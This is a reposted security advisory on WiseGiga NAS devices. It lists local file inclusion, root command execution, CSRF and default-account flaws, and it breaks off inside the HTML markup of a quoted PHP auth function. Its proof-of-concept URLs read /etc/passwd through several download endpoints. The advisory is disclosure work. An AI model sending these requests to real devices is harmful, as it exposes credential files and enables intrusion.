{"id":9094,"date":"2017-09-05T14:19:06","date_gmt":"2017-09-05T22:19:06","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/09\/05\/news-2867\/"},"modified":"2017-09-05T14:19:06","modified_gmt":"2017-09-05T22:19:06","slug":"news-2867","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/09\/05\/news-2867\/","title":{"rendered":"SSD Advisory \u2013 WiseGiga NAS Multiple Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Tue, 05 Sep 2017 11:11:02 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\">ssd@beyondsecurity.com<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities summary<\/strong><br \/> The following advisory describes five (5) vulnerabilities and default accounts \/ passwords found in WiseGiga NAS devices.<\/p>\n<p>WiseGiga is a Korean company selling NAS products.<\/p>\n<p>The vulnerabilities found in WiseGiga NAS are:<\/p>\n<ul>\n<li>Pre-Authentication Local File Inclusion (4 different vulnerabilities)<\/li>\n<li>Post-Authentication Local File Inclusion<\/li>\n<li>Remote Command Execution as root<\/li>\n<li>Remote Command Execution as root with CSRF<\/li>\n<li>Info Leak<\/li>\n<li>Default accounts<\/li>\n<\/ul>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Pierre Kim, has reported these vulnerabilities to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> We have tried to contact WiseGiga since June 2017; repeated attempts to establish contact went unanswered. 
At this time there is no solution or workaround for these vulnerabilities.<\/p>\n<p><span id=\"more-3402\"><\/span><\/p>\n<p><u><strong>Vulnerabilities details<\/strong><\/u><\/p>\n<p><strong>Pre-Authentication Local File Inclusion<\/strong><br \/> User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords).<\/p>\n<p>By sending GET request to the following URI&#8217;s with <em>filename=<\/em> as a parameter, an attacker can trigger the vulnerabilities:<\/p>\n<ul>\n<li>\/webfolder\/download_file1.php<\/li>\n<li>down_data.php<\/li>\n<li>download_file.php<\/li>\n<li>mobile\/download_file1.php<\/li>\n<\/ul>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d98056c344191284\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button 
crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/IP\/webfolder\/download_file1.php?filename=\/etc\/passwd  http:\/\/IP\/down_data.php?filename=\/etc\/passwd  http:\/\/IP\/download_file.php?filename=base64(\/etc\/passwd)  http:\/\/IP\/mobile\/download_file1.php?filename=base64(\/etc\/passwd)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0005 seconds] -->  <\/p>\n<p><strong>Post-Authentication Local File Inclusion<\/strong><br \/> User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords).<\/p>\n<p>By sending GET request to <em>\/mobile\/download_file2.php<\/em>  an attacker can trigger the vulnerability.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d980579193819015\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div 
class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/IP\/\/mobile\/download_file2.php?filename=base64(\/etc\/passwd)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980579193819015-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d980579193819015-1\"><span 
class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/IP\/\/mobile\/download_file2.php?filename=base64(\/etc\/passwd)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p><strong>Remote Command Execution as root<\/strong><br \/> The WiseGiga NAS firmware contain <em>pre.php<\/em> files in the different directories. <\/p>\n<p>For example:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d98057f119083825\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" 
style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \/app_data\/apache\/htdocs\/auto\/pre.php  \/app_data\/apache\/htdocs\/admin\/iframe\/pre.php  \/app_data\/apache\/htdocs\/admin\/pre.php  \/app_data\/apache\/htdocs\/mobile\/pre.php  \/app_data\/apache\/htdocs\/wiseapp\/config\/pre.php  \/app_data\/apache\/htdocs\/pre.php  \/home\/htdocs\/webfolder\/pre.php  \/ub\/update\/init\/pre.php  \/tmp\/home\/root\/htdocs\/auto\/pre.php  \/tmp\/home\/root\/htdocs\/pre.php<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98057f119083825-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98057f119083825-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98057f119083825-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98057f119083825-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98057f119083825-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98057f119083825-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98057f119083825-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98057f119083825-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98057f119083825-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98057f119083825-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div 
class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d98057f119083825-1\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">app_data<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">apache<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">auto<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98057f119083825-2\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">app_data<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">apache<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">iframe<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d98057f119083825-3\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">app_data<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">apache<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98057f119083825-4\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">app_data<\/span><span class=\"crayon-o\">\/<\/span><span 
class=\"crayon-v\">apache<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">mobile<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d98057f119083825-5\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">app_data<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">apache<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">wiseapp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">config<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98057f119083825-6\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">app_data<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">apache<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d98057f119083825-7\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">home<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">webfolder<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98057f119083825-8\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ub<\/span><span 
class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">update<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">init<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d98057f119083825-9\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">home<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">auto<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98057f119083825-10\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">home<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0016 seconds] -->  <\/p>\n<p>A &#8220;standard&#8221; pre.php contains:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d980581988798820\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide 
delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">     181 [&#8230;]      182 function  auth()      183 {       184  global $memberid;      185  session_start();      186 \/\/echo $memberid;      187  if($memberid==&#8221;root&#8221;)      188  {      189   \/\/ print&lt;&lt;&lt;__DATA_OF_HTML__      190   \/\/&lt;script language=&#8221;JavaScript&#8221;&gt;      191   \/\/  alert(&#8220;sucess !&#8221;);      192   \/\/&lt;\/script&gt;      193 \/\/__DATA_OF_HTML__;      194  }      195  else      196  {      197   
print&lt;&lt;&lt;__DATA_OF_HTML__      198   &lt;script language=&#8221;JavaScript&#8221;&gt;      199     alert(&#8220;xc0xcexc1xf5xb9xdexc1xf6 xbexcaxc0xba xbbxe7xbfxebxc0xdaxc0xd4xb4xcfxb4xd9!&#8221;);      200 \/\/    location.href=&#8217;\/admin\/&#8217;;      201       window.open(&#8216;index.php&#8217;,&#8217;_parent&#8217;);      202     exit;      203   &lt;\/script&gt;      204 __DATA_OF_HTML__;      205  }      206      207 }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-59af22d980581988798820-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-27\">27<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-1\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">181<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-2\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-cn\">182<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">auth<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">183<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">184<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-m\">global<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">memberid<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">185<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">session_start<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">186<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/echo $memberid;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">187<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">memberid<\/span><span class=\"crayon-o\">==<\/span><span 
class=\"crayon-s\">&#8220;root&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">188<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">189<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/ print&lt;&lt;&lt;__DATA_OF_HTML__<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">190<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/<span class=\"crayon-ta\">&lt;script <\/span><span class=\"crayon-e\">language<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;JavaScript&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">191<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/&nbsp;&nbsp;alert(&#8220;sucess !&#8221;);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">192<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/&lt;\/script&gt;<\/span><\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">193<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/__DATA_OF_HTML__;<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-59af22d980581988798820-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">194<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">195<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">196<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">197<\/span><span 